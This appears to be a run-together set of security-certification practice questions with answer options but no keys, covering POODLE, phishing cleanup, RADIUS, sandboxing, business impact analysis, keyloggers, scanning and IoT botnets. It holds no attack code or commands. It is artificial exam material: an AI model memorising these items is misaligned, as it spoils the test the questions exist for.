The POODLE attack is an MITM exploit that affects: TLS1.0 with CBC mode cipher SSLv2.0 with CBC mode cipher SSLv3.0 with CBC mode cipher SSLv3.0 with ECB mode cipher.
Security administrators attempted corrective action after a phishing attack. Users are still experiencing trouble
logging in, as well as an increase in account lockouts. Users' email contacts are complaining of an increase in
spam and social networking requests. Due to the large number of affected accounts, remediation must be
accomplished quickly. Which of the following actions should be taken FIRST? (Select TWO) Disable the compromised accounts Update WAF rules to block social networks Remove the compromised accounts with all AD groups Change the compromised accounts' passwords Disable the open relay on the email server Enable sender policy framework.
Ann, a security administrator, wants to ensure credentials are encrypted in transit when implementing a
RADIUS server for SSO. Which of the following are needed given these requirements? (Select TWO) Public key Shared key Elliptic curve MD5 Private key DES.
Which of the following allows an auditor to test proprietary-software compiled code for security flaws? Fuzzing Static review Code signing Regression testing.
Which of the following is the BEST reason to run an untested application in a sandbox? To allow the application to take full advantage of the host system's resources and storage To utilize the host systems antivirus and firewall applications instead of running it own protection To prevent the application from acquiring escalated privileges and accessing its host system To increase application processing speed so the host system can perform real-time logging.
A manager wants to distribute a report to several other managers within the company. Some of them reside in
remote locations that are not connected to the domain but have a local server. Because there is sensitive data
within the report and the size is beyond the limit of the email attachment size, emailing the report is not an
option. Which of the following protocols should be implemented to distribute the report securely? (Select
TWO) S/MIME SSH SNMPv3 FTPS SRTP HTTPS LDAPS.
A company is performing an analysis of the corporate enterprise network with the intent of identifying what will
cause losses in revenue, referrals, and/or reputation when out of commission. Which of the following is an
element of a BIA that is being addressed? Mission-essential function Single point of failure backup and restoration plans Identification of critical systems.
Ann, a user, states that her machine has been behaving erratically over the past week. She has experienced
slowness and input lag and found text files that appear to contain pieces of her emails or online conversations
with coworkers. The technician runs a standard virus scan but detects nothing. Which of the following types of
malware has infected the machine? Ransomware Rootkit Backdoor Keylogger.
A security analyst is attempting to identify vulnerabilities in a customer's web application without impacting the
system or its data. Which of the following BEST describes the vulnerability scanning concept performed? Aggressive scan Passive scan Non-credentialed scan Compliance scan.
A systems administrator wants to implement a wireless protocol that will allow the organization to authenticate
mobile devices prior to providing the user with a captive portal login. Which of the following should the systems
administrator configure? L2TP with MAC filtering EAP-TTLS WPA2-CCMP with PSK RADIUS federation.
A user receives an email from ISP indicating malicious traffic coming from the user's home network is detected.
The traffic appears to be Linux-based, and it is targeting a website that was recently featured on the news as
being taken offline by an Internet attack. The only Linux device on the network is a home surveillance camera
system. Which of the following BEST describes what is happening? The camera system is infected with a bot. The camera system is infected with a RAT. The camera system is infected with a Trojan. The camera system is infected with a backdoor.
|
